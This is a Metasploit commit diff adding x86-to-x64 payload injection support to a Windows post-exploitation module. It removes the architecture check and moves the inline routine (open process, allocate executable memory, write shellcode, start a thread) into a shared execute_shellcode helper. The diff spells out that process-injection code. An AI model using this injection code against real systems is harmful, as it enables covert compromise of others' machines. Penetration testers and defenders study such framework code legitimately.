Land rapid7#3415 -- x86->x64 Payload Injection

OJ · OJ · commit aca8fcb3524e · 2014-06-18T11:09:55.000+10:00
diff --git a/lib/msf/core/post/windows/process.rb b/lib/msf/core/post/windows/process.rb
@@ -35,10 +35,10 @@ def execute_shellcode(shellcode, base_addr=nil, pid=nil)
     thread = host.thread.create(shell_addr,0)
     unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
       vprint_error("Unable to create thread")
-      return false
+      nil
     end
 
-    true
+    thread
   end
 
 end # Process
diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb
@@ -10,6 +10,8 @@
 class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
+  include Msf::Post::Windows::Process
+
   def initialize(info={})
     super( update_info( info,
       'Name'          => 'Windows Manage Memory Payload Injection',
@@ -52,13 +54,7 @@ def exploit
       return
     end
 
-    if @payload_arch.first =~ /64/ and client.platform =~ /x86/
-      print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
-      print_error("Migrate to an x64 process and try again.")
-      return false
-    else
-      inject_into_pid(pid)
-    end
+    inject_into_pid(pid)
   end
 
   # Figures out which PID to inject to
@@ -83,8 +79,6 @@ def has_pid?(pid)
       return false
     end
 
-    pids = []
-
     procs.each do |p|
       found_pid = p['pid']
       return true if found_pid == pid
@@ -144,27 +138,8 @@ def inject_into_pid(pid)
 
     begin
       print_status("Preparing '#{@payload_name}' for PID #{pid}")
-      raw = payload.generate
-
-      print_status("Opening process #{pid.to_s}")
-      host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
-      if not host_process
-        print_error("Unable to open #{pid.to_s}")
-        return
-      end
-
-      print_status("Allocating memory in procees #{pid}")
-      mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
-
-      # Ensure memory is set for execution
-      host_process.memory.protect(mem)
-
-      print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
-      print_status("Writing the stager into memory...")
-      host_process.memory.write(mem, raw)
-      host_process.thread.create(mem, 0)
-      print_good("Successfully injected payload in to process: #{pid}")
-
+      raw = payload.encoded
+      execute_shellcode(raw, nil, pid)
     rescue Rex::Post::Meterpreter::RequestError => e
       print_error("Unable to inject payload:")
       print_line(e.to_s)
